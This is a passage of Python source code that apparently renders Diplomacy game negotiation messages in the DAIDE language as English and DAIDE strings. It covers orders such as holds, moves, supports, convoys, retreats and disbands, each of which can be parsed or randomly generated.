                    self.english = 'If ' + self.antecedent.formsimpleenglish() + ', then maybe ' + self.consequent.formsimpleenglish()
                # (YES (PRP (NAR (IFF
                elif self.container.container.container.operator == 'YES':
                    self.english = 'I agree, it may be that if ' + self.antecedent.formsimpleenglish() + ', then maybe ' + self.consequent.formsimpleenglish()
                # (REJ (PRP (NAR (IFF
                elif self.container.container.container.operator == 'REJ':
                    self.english = 'I disagree that if ' + self.antecedent.formsimpleenglish() + ', then maybe ' + self.consequent.formsimpleenglish()
                # (CCL (PRP (NAR (IFF
                elif self.container.container.container.operator == 'CCL':
                    self.english = 'I wish to ' + random.choice(['cancel', 'retract', 'take back']) + ' my proposal of ' + \
                                   self.antecedent.formsimpleenglish() + ' for ' + self.consequent.formsimpleenglish()
                # (HUH (PRP (NAR (IFF
                elif self.container.container.container.operator == 'HUH':
                    self.english = 'I do not understand your proposal of a quid pro quo.'
            elif self.container.container.operator == 'FCT':
                # (FCT (NAR (IFF
                if self.container.container.container is None:
                    self.english = 'It is unclear that if ' + self.antecedent.formsimpleenglish() + ', then ' + self.consequent.formsimpleenglish()
                # (HUH (FCT (NAR (IFF
                elif self.container.container.container.operator == 'HUH':
                    self.english = 'I do not understand your statement about a trade.'
        elif self.container.operator == 'FCT':
            # (FCT (IFF
            if self.container.container is None:
                self.english = 'I believe that if ' + self.antecedent.formsimpleenglish() + ', then ' + self.consequent.formsimpleenglish()
                if self.alternative is not None:
                    # BUGFIX: was self.antecedent; the fallback branch is the alternative.
                    self.english += ' If not this, then ' + self.alternative.formsimpleenglish() + '.'
            # (HUH (FCT (IFF
            elif self.container.container.operator == 'HUH':
                self.english = 'I do not understand your statement about a trade.'
        else:
            self.english = self.formsimpleenglish()
        return self.english
    def formsimpleenglish(self):  # type () -> str
        """
        Creates an English expression about the conditional in the context of a sender, recipients and desired tone.
        :return: the English expression
        :rtype: str
        """
        self.simpleenglish = 'if ' + self.antecedent.formsimpleenglish() + ', then ' + self.consequent.formsimpleenglish()
        if self.alternative is not None:
            self.simpleenglish += ', otherwise ' + self.alternative.formsimpleenglish()
        return self.simpleenglish
    def formDAIDE(self):  # type () -> str
        """
        Create a DAIDE representation of this Message
        :return: the DAIDE message
        :rtype: str
        """
        retval = 'IFF ' + '(' + self.antecedent.formDAIDE() + ') (' + self.consequent.formDAIDE() + ')'
        if self.alternative is not None:
            retval += ' ELS (' + self.alternative.formDAIDE() + ')'
        return retval
class PressNot(PressMessage):
    """ The game-related content of a negation. """
    def __init__(self, utterance, container, thelists):  # type: (PressUtterance, PressMessage, []) -> None
        """
        Initialize the message with an utterance
        :param utterance: the press utterance that this message is within the content for
        :type utterance: PressUtterance
        :param container: the press message that contains this one
        :type container: PressMessage
        :param thelists: the parsed, nested DAIDE statement
        :type thelists: []
        """
        super().__init__(utterance, container)
        self.proposition = PressMessage(utterance, self)
        if not thelists:
            # No parse supplied: negate a randomly generated proposition.
            self.operator = 'NOT'
            chosen = random.choice(['PCE', 'ALY', 'DMZ', 'SLO', 'DRW', 'XDO'])
            self.proposition = randomFactory(utterance, self, chosen)
        elif len(thelists) == 2:
            # Parsed form: ('NOT', <proposition>)
            self.operator = thelists[0]
            self.proposition = messageFactory(utterance, self, thelists[1])
    def formenglish(self):  # type () -> str
        """
        Creates an English expression about the negation in the context of a sender, recipients and desired tone.
        Delegates entirely to the wrapped proposition.
        :return: the English expression
        :rtype: str
        """
        rendered = self.proposition.formenglish()
        self.english = rendered
        return rendered
    def formsimpleenglish(self):  # type () -> str
        """
        Creates an English expression about the negation in the context of a sender, recipients and desired tone.
        :return: the English expression
        :rtype: str
        """
        self.simpleenglish = '%s is not happening' % self.proposition.formsimpleenglish()
        return self.simpleenglish
    def formDAIDE(self):  # type () -> str
        """
        Create a DAIDE representation of this Message
        :return: the DAIDE message
        :rtype: str
        """
        return 'NOT (' + self.proposition.formDAIDE() + ')'
class PressNar(PressMessage):
    """ The game-related content of missing evidence. """
    def __init__(self, utterance, container, thelists):  # type: (PressUtterance, PressMessage, []) -> None
        """
        Initialize the message with an utterance
        :param utterance: the press utterance that this message is within the content for
        :type utterance: PressUtterance
        :param container: the press message that contains this one
        :type container: PressMessage
        :param thelists: the parsed, nested DAIDE statement
        :type thelists: []
        """
        super().__init__(utterance, container)
        self.proposition = PressMessage(utterance, self)
        if not thelists:
            # No parse supplied: be uncertain about a randomly generated proposition.
            self.operator = 'NAR'
            chosen = random.choice(['PCE', 'ALY', 'DMZ', 'SLO', 'DRW', 'XDO'])
            self.proposition = randomFactory(utterance, self, chosen)
        elif len(thelists) == 2:
            # Parsed form: ('NAR', <proposition>)
            self.operator = thelists[0]
            self.proposition = messageFactory(utterance, self, thelists[1])
    def formenglish(self):  # type () -> str
        """
        Creates an English expression about the missing evidence in the context of a sender, recipients and desired tone.
        Delegates entirely to the wrapped proposition.
        :return: the English expression
        :rtype: str
        """
        rendered = self.proposition.formenglish()
        self.english = rendered
        return rendered
    def formsimpleenglish(self):  # type () -> str
        """
        Creates an English expression about the missing evidence in the context of a sender, recipients and desired tone.
        :return: the English expression
        :rtype: str
        """
        self.simpleenglish = 'it is uncertain that %s' % self.proposition.formsimpleenglish()
        return self.simpleenglish
    def formDAIDE(self):  # type () -> str
        """
        Create a DAIDE representation of this Message
        :return: the DAIDE message
        :rtype: str
        """
        return 'NAR (' + self.proposition.formDAIDE() + ')'
class PressMoveExecute(PressMessage):
    """ The game-related content of an executable move (DAIDE XDO). """
    def __init__(self, utterance, container, thelists): # type: (PressUtterance, PressMessage, []) -> None
        """
        Initialize the message with an utterance
        :param utterance: the press utterance that this message is within the content for
        :type utterance: PressUtterance
        :param container: the press message that contains this one
        :type container: PressMessage
        :param thelists: the parsed, nested DAIDE statement
        :type thelists: []
        """
        super().__init__(utterance, container)
        if thelists is None or len(thelists) == 0:
            # No parse supplied: fabricate a random order of any supported type.
            self.operator = 'XDO'
            detword = random.choice(['HLD', 'MTO', 'SUP', 'SUPMTO', 'CVYCTO', 'CVYVIA', 'RTO', 'DSB', 'BLD', 'REM', 'WVE'])
            self.details = randomFactory(utterance, self, detword)
        elif len(thelists) == 2:
            # Parsed form: ('XDO', <order>)
            self.operator = thelists[0]
            self.details = messageFactory(utterance, self, thelists[1])
    def formenglish(self): # type () -> str
        """
        Creates an English expression about the executable move in the context of a sender, recipients and desired tone.
        Wording is picked by walking the chain of enclosing operators
        (PRP/NOT/NAR/FCT, optionally wrapped by a YES/REJ/CCL/HUH reply).
        NOTE(review): each branch dereferences self.container.container(.container)
        without a None check beyond the ones shown - assumes callers only nest XDO
        under the operator chains enumerated here; confirm against the factories.
        :return: the English expression
        :rtype: str
        """
        if self.container.operator == 'PRP':
            # (PRP (XDO
            if self.container.container is None:
                self.english = 'I ' + random.choice(['propose', 'request', 'demand']) + ' this move: ' + self.details.formsimpleenglish()
            # (YES (PRP (XDO
            elif self.container.container.operator == 'YES':
                self.english = 'I ' + random.choice(['agree to', 'concur with', 'accept']) + ' the move: ' + self.details.formsimpleenglish()
            # (REJ (PRP (XDO
            elif self.container.container.operator == 'REJ':
                self.english = 'I ' + random.choice(['reject', 'do not concur with', 'do not approve of']) + ' the move: ' + self.details.formsimpleenglish()
            # (CCL (PRP (XDO
            elif self.container.container.operator == 'CCL':
                self.english = 'I wish to ' + random.choice(['cancel', 'retract', 'take back']) + ' my proposal of the move: ' + self.details.formsimpleenglish()
            # (HUH (PRP (XDO
            elif self.container.container.operator == 'HUH':
                self.english = 'I do not understand your move proposal.'
        elif self.container.operator == 'NOT':
            if self.container.container.operator == 'PRP':
                # (PRP (NOT (XDO
                if self.container.container.container is None:
                    self.english = 'I do not want the following move to happen: ' + self.details.formsimpleenglish()
                # (YES (PRP (NOT (XDO
                elif self.container.container.container.operator == 'YES':
                    self.english = 'I ' + random.choice(['agree', 'concur']) + ' that this move will not happen: ' + self.details.formsimpleenglish()
                # (REJ (PRP (NOT (XDO
                elif self.container.container.container.operator == 'REJ':
                    self.english = 'I do not promise that I won\'t make this move: ' + self.details.formsimpleenglish()
                # (CCL (PRP (NOT (XDO
                elif self.container.container.container.operator == 'CCL':
                    self.english = 'I wish to ' + random.choice(['cancel', 'retract', 'take back']) + ' my objection to the move: ' + self.details.formsimpleenglish()
                # (HUH (PRP (NOT (XDO
                elif self.container.container.container.operator == 'HUH':
                    self.english = 'I do not understand your proposal about a move.'
            elif self.container.container.operator == 'FCT':
                # (FCT (NOT (XDO
                if self.container.container.container is None:
                    self.english = 'It is unlikely that this move will occur: ' + self.details.formsimpleenglish()
                # (HUH (FCT (NOT (XDO
                elif self.container.container.container.operator == 'HUH':
                    self.english = 'I do not understand your statement about a move.'
        elif self.container.operator == 'NAR':
            if self.container.container.operator == 'PRP':
                # (PRP (NAR (XDO
                if self.container.container.container is None:
                    self.english = 'I am not sure about the move: ' + self.details.formsimpleenglish()
                # (YES (PRP (NAR (XDO
                elif self.container.container.container.operator == 'YES':
                    self.english = 'I ' + random.choice(['agree', 'concur']) + ' that we should be hesitant about the move: ' + self.details.formsimpleenglish()
                # (REJ (PRP (NAR (XDO
                elif self.container.container.container.operator == 'REJ':
                    self.english = 'No, I ' + random.choice(['think', 'believe']) + ' that we should be sure about the move: ' + self.details.formsimpleenglish()
                # (CCL (PRP (NAR (XDO
                elif self.container.container.container.operator == 'CCL':
                    self.english = 'I wish to ' + random.choice(['cancel', 'retract', 'take back']) + ' my hesitance about the move: ' + self.details.formsimpleenglish()
                # (HUH (PRP (NAR (XDO
                elif self.container.container.container.operator == 'HUH':
                    self.english = 'I do not understand your proposal about a move.'
            elif self.container.container.operator == 'FCT':
                # (FCT (NAR (XDO
                if self.container.container.container is None:
                    self.english = 'It is unclear if this move will happen: ' + self.details.formsimpleenglish()
                # (HUH (FCT (NAR (XDO
                elif self.container.container.container.operator == 'HUH':
                    self.english = 'I do not understand your statement about a move.'
        elif self.container.operator == 'FCT':
            # (FCT (XDO
            if self.container.container is None:
                self.english = 'This move will happen: ' + self.details.formsimpleenglish()
            # (HUH (FCT (XDO
            elif self.container.container.operator == 'HUH':
                self.english = 'I do not understand your statement about a move.'
        else:
            # Unrecognized container: fall back to the plain description.
            self.english = self.formsimpleenglish()
        return self.english
    def formsimpleenglish(self): # type () -> str
        """
        Creates an English expression about the executable move by delegating to the wrapped order.
        :return: the English expression
        :rtype: str
        """
        self.simpleenglish = self.details.formsimpleenglish()
        return self.simpleenglish
    def formDAIDE(self): # type () -> str
        """
        Create a DAIDE representation of this Message
        :return: the DAIDE message
        :rtype: str
        """
        return 'XDO ' + '(' + self.details.formDAIDE() + ')'
class PressHold(PressMessage):
    """ The game-related content of a hold. """
    def __init__(self, utterance, container, thelists):  # type: (PressUtterance, PressMessage, []) -> None
        """
        Initialize the message with an utterance
        :param utterance: the press utterance that this message is within the content for
        :type utterance: PressUtterance
        :param container: the press message that contains this one
        :type container: PressMessage
        :param thelists: the parsed, nested DAIDE statement
        :type thelists: []
        """
        super().__init__(utterance, container)
        if thelists is None or len(thelists) == 0:
            self.operator = 'HLD'
            # Pick the owning power: usually the sender or a recipient, occasionally anyone.
            if random.choice([True, True, False]):
                if random.choice([True, False]):
                    owner = utterance.frompower
                else:
                    owner = random.choice(utterance.topowers)
            else:
                owner = random.choice(helpers.powerlist)
            self.unit = [owner, random.choice(helpers.unitlist), random.choice(helpers.provincelist)]
        elif len(thelists) == 2:
            # Parsed form: ((power unit province), 'HLD')
            self.operator = thelists[1]
            self.unit = thelists[0]
    def formenglish(self):  # type () -> str
        """
        Creates an English expression about the hold in the context of a sender, recipients and desired tone.
        :return: the English expression
        :rtype: str
        """
        rendered = self.formsimpleenglish()
        self.english = rendered
        return rendered
    def formsimpleenglish(self):  # type () -> str
        """
        Creates an English expression about the hold in the context of a sender, recipients and desired tone.
        :return: the English expression
        :rtype: str
        """
        pieces = [helpers.powerdict[self.unit[0]]['Objective'],
                  ' holds their ',
                  helpers.unitdict[self.unit[1]]['Objective'],
                  ' in ',
                  helpers.provincedict[self.unit[2]]['Objective'],
                  '.']
        self.simpleenglish = ''.join(pieces)
        if 'Expert' in self.utterance.tones:
            # Append compact order notation for expert readers.
            unittype = 'F' if self.unit[1] == 'FLT' else 'A'
            self.simpleenglish += ' (' + unittype + ' ' + self.unit[2] + ' H).'
        return self.simpleenglish
    def formDAIDE(self):  # type () -> str
        """
        Create a DAIDE representation of this Message
        :return: the DAIDE message
        :rtype: str
        """
        return '(%s) HLD' % ' '.join(self.unit)
class PressMoveInto(PressMessage):
    """ The game-related content of a move. """
    def __init__(self, utterance, container, thelists):  # type: (PressUtterance, PressMessage, []) -> None
        """
        Initialize the message with an utterance
        :param utterance: the press utterance that this message is within the content for
        :type utterance: PressUtterance
        :param container: the press message that contains this one
        :type container: PressMessage
        :param thelists: the parsed, nested DAIDE statement
        :type thelists: []
        """
        super().__init__(utterance, container)
        if thelists is None or len(thelists) == 0:
            self.operator = 'MTO'
            # Pick the owning power: usually the sender or a recipient, occasionally anyone.
            if random.choice([True, True, False]):
                if random.choice([True, False]):
                    owner = utterance.frompower
                else:
                    owner = random.choice(utterance.topowers)
            else:
                owner = random.choice(helpers.powerlist)
            self.unit = [owner, random.choice(helpers.unitlist), random.choice(helpers.provincelist)]
            # Destination must differ from the unit's current province.
            options = [prov for prov in helpers.provincelist if prov != self.unit[2]]
            self.province = random.choice(options)
        elif len(thelists) == 3:
            # Parsed form: ((power unit province), 'MTO', destination)
            self.operator = thelists[1]
            self.unit = thelists[0]
            self.province = thelists[2]
    def formenglish(self):  # type () -> str
        """
        Creates an English expression about the move in the context of a sender, recipients and desired tone.
        :return: the English expression
        :rtype: str
        """
        rendered = self.formsimpleenglish()
        self.english = rendered
        return rendered
    def formsimpleenglish(self):  # type () -> str
        """
        Creates an English expression about the move in the context of a sender, recipients and desired tone.
        :return: the English expression
        :rtype: str
        """
        pieces = [helpers.powerdict[self.unit[0]]['Objective'],
                  ' moves their ',
                  helpers.unitdict[self.unit[1]]['Objective'],
                  ' from ',
                  helpers.provincedict[self.unit[2]]['Objective'],
                  ' to ',
                  helpers.provincedict[self.province]['Objective'],
                  '.']
        self.simpleenglish = ''.join(pieces)
        if 'Expert' in self.utterance.tones:
            # Append compact order notation for expert readers.
            unittype = 'F' if self.unit[1] == 'FLT' else 'A'
            self.simpleenglish += ' (' + unittype + ' ' + self.unit[2] + ' -> ' + self.province + ').'
        return self.simpleenglish
    def formDAIDE(self):  # type () -> str
        """
        Create a DAIDE representation of this Message
        :return: the DAIDE message
        :rtype: str
        """
        return '(%s) MTO %s' % (' '.join(self.unit), self.province)
class PressSupportHold(PressMessage):
    """ The game-related content of a hold support. """
    def _pickunit(self, utterance):
        """ Pick a random unit: usually owned by the sender or a recipient, occasionally by anyone. """
        if random.choice([True, True, False]):
            if random.choice([True, False]):
                owner = utterance.frompower
            else:
                owner = random.choice(utterance.topowers)
        else:
            owner = random.choice(helpers.powerlist)
        return [owner, random.choice(helpers.unitlist), random.choice(helpers.provincelist)]
    def __init__(self, utterance, container, thelists):  # type: (PressUtterance, PressMessage, []) -> None
        """
        Initialize the message with an utterance
        :param utterance: the press utterance that this message is within the content for
        :type utterance: PressUtterance
        :param container: the press message that contains this one
        :type container: PressMessage
        :param thelists: the parsed, nested DAIDE statement
        :type thelists: []
        """
        super().__init__(utterance, container)
        if thelists is None or len(thelists) == 0:
            self.operator = 'SUP'
            self.supporter = self._pickunit(utterance)
            self.supported = self._pickunit(utterance)
        elif len(thelists) == 3:
            # Parsed form: ((supporter), 'SUP', (supported))
            self.operator = thelists[1]
            self.supporter = thelists[0]
            self.supported = thelists[2]
    def formenglish(self):  # type () -> str
        """
        Creates an English expression about the hold support in the context of a sender, recipients and desired tone.
        :return: the English expression
        :rtype: str
        """
        rendered = self.formsimpleenglish()
        self.english = rendered
        return rendered
    def formsimpleenglish(self):  # type () -> str
        """
        Creates an English expression about the hold support in the context of a sender, recipients and desired tone.
        :return: the English expression
        :rtype: str
        """
        pieces = [helpers.powerdict[self.supporter[0]]['Objective'],
                  ' provides support with their ',
                  helpers.unitdict[self.supporter[1]]['Objective'],
                  ' in ',
                  helpers.provincedict[self.supporter[2]]['Objective'],
                  ' for ',
                  helpers.powerdict[self.supported[0]]['Objective'],
                  ' to hold their ',
                  helpers.unitdict[self.supported[1]]['Objective'],
                  ' in ',
                  helpers.provincedict[self.supported[2]]['Objective'],
                  '.']
        self.simpleenglish = ''.join(pieces)
        if 'Expert' in self.utterance.tones:
            # Append compact order notation for expert readers.
            supportertype = 'F' if self.supporter[1] == 'FLT' else 'A'
            supportedtype = 'F' if self.supported[1] == 'FLT' else 'A'
            self.simpleenglish += ' (' + supportertype + ' ' + self.supporter[2] + ' S ' + supportedtype + ' ' + self.supported[2] + ' H).'
        return self.simpleenglish
    def formDAIDE(self):  # type () -> str
        """
        Create a DAIDE representation of this Message
        :return: the DAIDE message
        :rtype: str
        """
        return '({}) SUP ({})'.format(' '.join(self.supporter), ' '.join(self.supported))
class PressSupportMove(PressMessage):
    """ The game-related content of a move support. """
    def _pickunit(self, utterance):
        """ Pick a random unit: usually owned by the sender or a recipient, occasionally by anyone. """
        if random.choice([True, True, False]):
            if random.choice([True, False]):
                owner = utterance.frompower
            else:
                owner = random.choice(utterance.topowers)
        else:
            owner = random.choice(helpers.powerlist)
        return [owner, random.choice(helpers.unitlist), random.choice(helpers.provincelist)]
    def __init__(self, utterance, container, thelists):  # type: (PressUtterance, PressMessage, []) -> None
        """
        Initialize the message with an utterance
        :param utterance: the press utterance that this message is within the content for
        :type utterance: PressUtterance
        :param container: the press message that contains this one
        :type container: PressMessage
        :param thelists: the parsed, nested DAIDE statement
        :type thelists: []
        """
        super().__init__(utterance, container)
        if thelists is None or len(thelists) == 0:
            self.operator = 'SUP'
            self.supporter = self._pickunit(utterance)
            self.supported = self._pickunit(utterance)
            # Destination must differ from both units' current provinces.
            occupied = (self.supporter[2], self.supported[2])
            options = [prov for prov in helpers.provincelist if prov not in occupied]
            self.province = random.choice(options)
        elif len(thelists) == 5:
            # Parsed form: ((supporter), 'SUP', (supported), 'MTO', destination)
            self.operator = thelists[1]
            self.supporter = thelists[0]
            self.supported = thelists[2]
            self.province = thelists[4]
    def formenglish(self):  # type () -> str
        """
        Creates an English expression about the move support in the context of a sender, recipients and desired tone.
        :return: the English expression
        :rtype: str
        """
        rendered = self.formsimpleenglish()
        self.english = rendered
        return rendered
    def formsimpleenglish(self):  # type () -> str
        """
        Creates an English expression about the move support in the context of a sender, recipients and desired tone.
        :return: the English expression
        :rtype: str
        """
        pieces = [helpers.powerdict[self.supporter[0]]['Objective'],
                  ' provides support with their ',
                  helpers.unitdict[self.supporter[1]]['Objective'],
                  ' in ',
                  helpers.provincedict[self.supporter[2]]['Objective'],
                  ' so ',
                  helpers.powerdict[self.supported[0]]['Objective'],
                  ' can move their ',
                  helpers.unitdict[self.supported[1]]['Objective'],
                  ' from ',
                  helpers.provincedict[self.supported[2]]['Objective'],
                  ' into ',
                  helpers.provincedict[self.province]['Objective'],
                  '.']
        self.simpleenglish = ''.join(pieces)
        if 'Expert' in self.utterance.tones:
            # Append compact order notation for expert readers.
            supportertype = 'F' if self.supporter[1] == 'FLT' else 'A'
            supportedtype = 'F' if self.supported[1] == 'FLT' else 'A'
            self.simpleenglish += ' (' + supportertype + ' ' + self.supporter[2] + ' S ' + supportedtype + ' ' + self.supported[2] + ' -> ' + self.province + ').'
        return self.simpleenglish
    def formDAIDE(self):  # type () -> str
        """
        Create a DAIDE representation of this Message
        :return: the DAIDE message
        :rtype: str
        """
        return '({}) SUP ({}) MTO {}'.format(' '.join(self.supporter), ' '.join(self.supported), self.province)
class PressConvoy(PressMessage):
    """ The game-related content of a convoy. """
    def __init__(self, utterance, container, thelists): # type: (PressUtterance, PressMessage, []) -> None
        """
        Initialize the message with an utterance
        :param utterance: the press utterance that this message is within the content for
        :type utterance: PressUtterance
        :param container: the press message that contains this one
        :type container: PressMessage
        :param thelists: the parsed, nested DAIDE statement
        :type thelists: []
        """
        super().__init__(utterance, container)
        if thelists is None or len(thelists) == 0:
            # No parsed DAIDE supplied: fabricate a random convoy order.
            self.operator = 'CVY'
            # Weighted choice: 2/3 of the time the convoying unit belongs to a conversation
            # participant (the sender, else a random recipient), 1/3 of the time to any power.
            if random.choice([True, True, False]):
                if random.choice([True, False]):
                    self.convoyunit = [utterance.frompower, random.choice(helpers.unitlist), random.choice(helpers.provincelist)]
                else:
                    self.convoyunit = [random.choice(utterance.topowers), random.choice(helpers.unitlist), random.choice(helpers.provincelist)]
            else:
                self.convoyunit = [random.choice(helpers.powerlist), random.choice(helpers.unitlist), random.choice(helpers.provincelist)]
            # Same 2/3-vs-1/3 weighting for the convoyed unit.
            if random.choice([True, True, False]):
                if random.choice([True, False]):
                    self.convoyedunit = [utterance.frompower, random.choice(helpers.unitlist), random.choice(helpers.provincelist)]
                else:
                    self.convoyedunit = [random.choice(utterance.topowers), random.choice(helpers.unitlist), random.choice(helpers.provincelist)]
            else:
                self.convoyedunit = [random.choice(helpers.powerlist), random.choice(helpers.unitlist), random.choice(helpers.provincelist)]
            # The destination must differ from both units' current provinces.
            provlist = [curprov for curprov in helpers.provincelist if curprov != self.convoyunit[2] and curprov != self.convoyedunit[2]]
            self.province = random.choice(provlist)
        elif len(thelists) == 5:
            # Parsed form: [convoyunit, 'CVY', convoyedunit, 'CTO', province].
            self.operator = thelists[1]
            self.convoyunit = thelists[0]
            self.convoyedunit = thelists[2]
            self.province = thelists[4]
    def formenglish(self): # type: () -> str
        """
        Creates an English expression about the convoy in the context of a sender, recipients and desired tone.
        :return: the English expression
        :rtype: str
        """
        self.english = self.formsimpleenglish()
        return self.english
    def formsimpleenglish(self): # type: () -> str
        """
        Creates an English expression about the convoy in the context of a sender, recipients and desired tone.
        :return: the English expression
        :rtype: str
        """
        self.simpleenglish = helpers.powerdict[self.convoyunit[0]]['Objective'] + \
                             '\'s ' + \
                             helpers.unitdict[self.convoyunit[1]]['Objective'] + \
                             ' in ' + \
                             helpers.provincedict[self.convoyunit[2]]['Objective'] + \
                             ' convoys ' + \
                             helpers.powerdict[self.convoyedunit[0]]['Objective'] + \
                             '\'s ' + \
                             helpers.unitdict[self.convoyedunit[1]]['Objective'] + \
                             ' from ' + \
                             helpers.provincedict[self.convoyedunit[2]]['Objective'] + \
                             ' into ' + \
                             helpers.provincedict[self.province]['Objective'] + '.'
        if 'Expert' in self.utterance.tones:
            # Expert tone shorthand: convoying units are written as fleets ('F') and
            # convoyed units as armies ('A') unconditionally here.
            convoytype = 'F'
            convoyedtype = 'A'
            self.simpleenglish += ' (' + convoytype + ' ' + self.convoyunit[2] + ' C ' + convoyedtype + ' ' + self.convoyedunit[2] + ' -> ' + self.province + ').'
        return self.simpleenglish
    def formDAIDE(self): # type: () -> str
        """
        Create a DAIDE representation of this Message
        :return: the DAIDE message, e.g. "(ENG FLT NTH) CVY (ENG AMY YOR) CTO NWY"
        :rtype: str
        """
        return '(' + ' '.join(self.convoyunit) + ') CVY (' + ' '.join(self.convoyedunit) + ') CTO ' + self.province
class PressConvoyVia(PressMessage):
    """ The game-related content of a convoy over water. """
    def __init__(self, utterance, container, thelists): # type: (PressUtterance, PressMessage, []) -> None
        """
        Initialize the message with an utterance
        :param utterance: the press utterance that this message is within the content for
        :type utterance: PressUtterance
        :param container: the press message that contains this one
        :type container: PressMessage
        :param thelists: the parsed, nested DAIDE statement
        :type thelists: []
        """
        super().__init__(utterance, container)
        if thelists is None or len(thelists) == 0:
            # No parsed DAIDE supplied: fabricate a random convoy-via order.
            self.operator = 'CTO'
            # Weighted choice: 2/3 of the time the convoyed unit belongs to a conversation
            # participant (the sender, else a random recipient), 1/3 of the time to any power.
            if random.choice([True, True, False]):
                if random.choice([True, False]):
                    self.convoyedunit = [utterance.frompower, random.choice(helpers.unitlist), random.choice(helpers.provincelist)]
                else:
                    self.convoyedunit = [random.choice(utterance.topowers), random.choice(helpers.unitlist), random.choice(helpers.provincelist)]
            else:
                self.convoyedunit = [random.choice(helpers.powerlist), random.choice(helpers.unitlist), random.choice(helpers.provincelist)]
            # Destination must differ from the unit's current province; the route
            # is 1-4 distinct sea provinces.
            provlist = [curprov for curprov in helpers.provincelist if curprov != self.convoyedunit[2]]
            self.destination = random.choice(provlist)
            self.searoute = random.sample(helpers.sealist, random.randint(1, 4))
        elif len(thelists) == 5:
            # Parsed form: [convoyedunit, 'CTO', destination, 'VIA', searoute].
            self.operator = thelists[1]
            self.convoyedunit = thelists[0]
            self.destination = thelists[2]
            self.searoute = thelists[4]
    def formenglish(self): # type: () -> str
        """
        Creates an English expression about the convoy over water in the context of a sender, recipients and desired tone.
        :return: the English expression
        :rtype: str
        """
        self.english = self.formsimpleenglish()
        return self.english
    def formsimpleenglish(self): # type: () -> str
        """
        Creates an English expression about the convoy over water in the context of a sender, recipients and desired tone.
        :return: the English expression
        :rtype: str
        """
        self.simpleenglish = helpers.powerdict[self.convoyedunit[0]]['Objective'] + \
                             '\'s ' + \
                             helpers.unitdict[self.convoyedunit[1]]['Objective'] + \
                             ' in ' + \
                             helpers.provincedict[self.convoyedunit[2]]['Objective'] + \
                             ' moves by convoy to ' + \
                             helpers.provincedict[self.destination]['Objective'] + \
                             ' following this path: ' + \
                             helpers.listOfProvinces(self.searoute) + '.'
        return self.simpleenglish
    def formDAIDE(self): # type: () -> str
        """
        Create a DAIDE representation of this Message
        :return: the DAIDE message, e.g. "(ENG AMY YOR) CTO NWY VIA (NTH)"
        :rtype: str
        """
        return '(' + ' '.join(self.convoyedunit) + ') CTO ' + self.destination + ' VIA (' + ' '.join(self.searoute) + ')'
class PressRetreat(PressMessage):
    """ The game-related content of a retreat. """
    def __init__(self, utterance, container, thelists): # type: (PressUtterance, PressMessage, []) -> None
        """
        Initialize the message with an utterance
        :param utterance: the press utterance that this message is within the content for
        :type utterance: PressUtterance
        :param container: the press message that contains this one
        :type container: PressMessage
        :param thelists: the parsed, nested DAIDE statement
        :type thelists: []
        """
        super().__init__(utterance, container)
        if thelists is None or len(thelists) == 0:
            # No parsed DAIDE supplied: fabricate a random retreat order.
            self.operator = 'RTO'
            # Weighted choice: 2/3 of the time the retreating unit belongs to a conversation
            # participant (the sender, else a random recipient), 1/3 of the time to any power.
            if random.choice([True, True, False]):
                if random.choice([True, False]):
                    self.unit = [utterance.frompower, random.choice(helpers.unitlist), random.choice(helpers.provincelist)]
                else:
                    self.unit = [random.choice(utterance.topowers), random.choice(helpers.unitlist), random.choice(helpers.provincelist)]
            else:
                self.unit = [random.choice(helpers.powerlist), random.choice(helpers.unitlist), random.choice(helpers.provincelist)]
            # The retreat destination must differ from the unit's current province.
            provlist = [curprov for curprov in helpers.provincelist if curprov != self.unit[2]]
            self.destination = random.choice(provlist)
        elif len(thelists) == 3:
            # Parsed form: [unit, 'RTO', destination].
            self.operator = thelists[1]
            self.unit = thelists[0]
            self.destination = thelists[2]
    def formenglish(self): # type: () -> str
        """
        Creates an English expression about the retreat in the context of a sender, recipients and desired tone.
        :return: the English expression
        :rtype: str
        """
        self.english = self.formsimpleenglish()
        return self.english
    def formsimpleenglish(self): # type: () -> str
        """
        Creates an English expression about the retreat in the context of a sender, recipients and desired tone.
        :return: the English expression
        :rtype: str
        """
        self.simpleenglish = helpers.powerdict[self.unit[0]]['Objective'] + \
                             '\'s ' + \
                             helpers.unitdict[self.unit[1]]['Objective'] + \
                             ' retreats from ' + \
                             helpers.provincedict[self.unit[2]]['Objective'] + \
                             ' to ' + \
                             helpers.provincedict[self.destination]['Objective'] + '.'
        return self.simpleenglish
    def formDAIDE(self): # type: () -> str
        """
        Create a DAIDE representation of this Message
        :return: the DAIDE message, e.g. "(FRA AMY PAR) RTO BUR"
        :rtype: str
        """
        return '(' + ' '.join(self.unit) + ') RTO ' + self.destination
class PressDisband(PressMessage):
    """ The game-related content of a disband. """
    def __init__(self, utterance, container, thelists): # type: (PressUtterance, PressMessage, []) -> None
        """
        Initialize the message with an utterance
        :param utterance: the press utterance that this message is within the content for
        :type utterance: PressUtterance
        :param container: the press message that contains this one
        :type container: PressMessage
        :param thelists: the parsed, nested DAIDE statement
        :type thelists: []
        """
        super().__init__(utterance, container)
        if thelists is None or len(thelists) == 0:
            # No parsed DAIDE supplied: fabricate a random disband order.
            self.operator = 'DSB'
            # Weighted choice: 2/3 of the time the unit belongs to a conversation
            # participant (the sender, else a random recipient), 1/3 of the time to any power.
            if random.choice([True, True, False]):
                if random.choice([True, False]):
                    self.unit = [utterance.frompower, random.choice(helpers.unitlist), random.choice(helpers.provincelist)]
                else:
                    self.unit = [random.choice(utterance.topowers), random.choice(helpers.unitlist), random.choice(helpers.provincelist)]
            else:
                self.unit = [random.choice(helpers.powerlist), random.choice(helpers.unitlist), random.choice(helpers.provincelist)]
        elif len(thelists) == 2:
            # Parsed form: [unit, 'DSB'].
            self.operator = thelists[1]
            self.unit = thelists[0]
    def formenglish(self): # type: () -> str
        """
        Creates an English expression about the disband in the context of a sender, recipients and desired tone.
        :return: the English expression
        :rtype: str
        """
        self.english = self.formsimpleenglish()
        return self.english
    def formsimpleenglish(self): # type: () -> str
        """
        Creates an English expression about the disband in the context of a sender, recipients and desired tone.
        :return: the English expression
        :rtype: str
        """
        self.simpleenglish = helpers.powerdict[self.unit[0]]['Objective'] + \
                             '\'s ' + \
                             helpers.unitdict[self.unit[1]]['Objective'] + \
                             ' in ' + \
                             helpers.provincedict[self.unit[2]]['Objective'] + \
                             ' retreats from the board.'
        return self.simpleenglish
    def formDAIDE(self): # type: () -> str
        """
        Create a DAIDE representation of this Message
        :return: the DAIDE message, e.g. "(FRA AMY PAR) DSB"
        :rtype: str
        """
        return '(' + ' '.join(self.unit) + ') DSB'
class PressBuild(PressMessage):
